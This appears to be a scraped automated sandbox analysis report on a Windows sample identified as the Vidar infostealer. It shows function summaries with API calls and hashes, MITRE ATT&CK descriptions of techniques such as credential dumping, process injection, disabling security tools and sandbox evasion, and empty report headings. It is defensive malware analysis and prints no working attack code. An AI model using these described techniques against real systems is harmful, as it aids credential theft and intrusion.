OpenProcess.KERNEL32(001FFFFF,00000000,00000000,00000010,?,007ECA10,00000000,0000000F,00000000,0041F648,007ECA10,0000000F,747861B0,00000010), ref: 0041713E
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041714A
CloseHandle.KERNEL32(00000000), ref: 00417151
_free.LIBCMT ref: 00417161

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandleProcess$CreateOpenSnapshotTerminateToolhelp32_free_malloc
String ID:
API String ID: 486718275-0
Opcode ID: 88e350bd4915f0adc2850e7e4ae473a47af4a785e8cb2460a7e95dc70eab1179
Instruction ID: a9f691b70349764571496d57c412afc6bc238ee9e7d35e4ab4f066066c225ec7
Opcode Fuzzy Hash: 88e350bd4915f0adc2850e7e4ae473a47af4a785e8cb2460a7e95dc70eab1179
Instruction Fuzzy Hash: 8CF0B4732042147BD200A6AA9C85F9FB3BC9B85764F01463AF76592280DA74AC8586AE

Uniqueness

Uniqueness Score: -1.00%

Function 00493390, Relevance: 6.0, APIs: 4, Instructions: 33fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004933AB
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,2D794ED1), ref: 004933BE
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,2D794ED1), ref: 004933C9
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,2D794ED1), ref: 004933DA

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: a77e2c15d4ccfd051175ff4ecdd267cc877b5e18a3f158a6fca0d42b6d9c7381
Instruction ID: 795d9d186629f84d3c271c6c627cb69cd0f77ad3184e3e007e0a01879458923b
Opcode Fuzzy Hash: a77e2c15d4ccfd051175ff4ecdd267cc877b5e18a3f158a6fca0d42b6d9c7381
Instruction Fuzzy Hash: 1BF08935640210ABD220EB28EC4DF8B7758AB55B51F018634FD54A22D0EA705919C669

Uniqueness

Uniqueness Score: -1.00%

Function 004032C0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004032D2

Part of subcall function 0049B188: std::exception::exception.LIBCMT ref: 0049B19D
Part of subcall function 0049B188: __CxxThrowException@8.LIBCMT ref: 0049B1B2
Part of subcall function 0049B188: std::exception::exception.LIBCMT ref: 0049B1C3

_memmove.LIBCMT ref: 0040331A

Strings

string too long, xrefs: 004032CD

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 1785806476-2556327735
Opcode ID: 39bcea5d81ef645e67796593aa89fec0f2a9da1ad67a1af513ea7ee5b341aff4
Instruction ID: 5da86d647c49e79fdf99b9f508c935f0504fb0c180d761ed05676a4a24ba0056
Opcode Fuzzy Hash: 39bcea5d81ef645e67796593aa89fec0f2a9da1ad67a1af513ea7ee5b341aff4
Instruction Fuzzy Hash: FE115B711447085BEB20AE6C6981A3FBB9CAB61710F500E3FE497D26C1DF79E9448298

Uniqueness

Uniqueness Score: -1.00%

Function 004041E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00404217

Part of subcall function 0049B347: std::ios_base::_Tidy.LIBCPMT ref: 0049B368

Strings

A@, xrefs: 004041EC
@A@, xrefs: 004041FA

Memory Dump Source

Source File: 00000001.00000002.397365231.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: std::ios_base::_$Ios_base_dtorTidy
String ID: @A@$A@
API String ID: 3167631304-3090660310
Opcode ID: e1432c0684c43e36d02e92e24d96ba77cfc77e8f4710dd6c85118a5264989d1f
Instruction ID: 88cf9c7263f093331865935adac68eaa63cbb1bb14d31e9a1b9d2fa4ed31915f
Opcode Fuzzy Hash: e1432c0684c43e36d02e92e24d96ba77cfc77e8f4710dd6c85118a5264989d1f
Instruction Fuzzy Hash: F2F05EB46002019FC710CF14D6889A6BBA1EF95318B24C0ADD9450B366C7B6ED86CBE9

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report T6zZFfRLqs.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Vidar

Yara Overview

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre